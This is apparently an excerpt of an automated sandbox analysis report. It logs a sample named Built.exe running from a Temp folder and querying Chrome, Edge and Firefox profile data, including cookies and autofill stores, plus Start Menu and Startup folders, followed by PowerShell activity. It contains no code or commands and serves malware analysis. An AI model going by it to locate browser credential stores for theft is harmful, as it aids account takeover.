Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
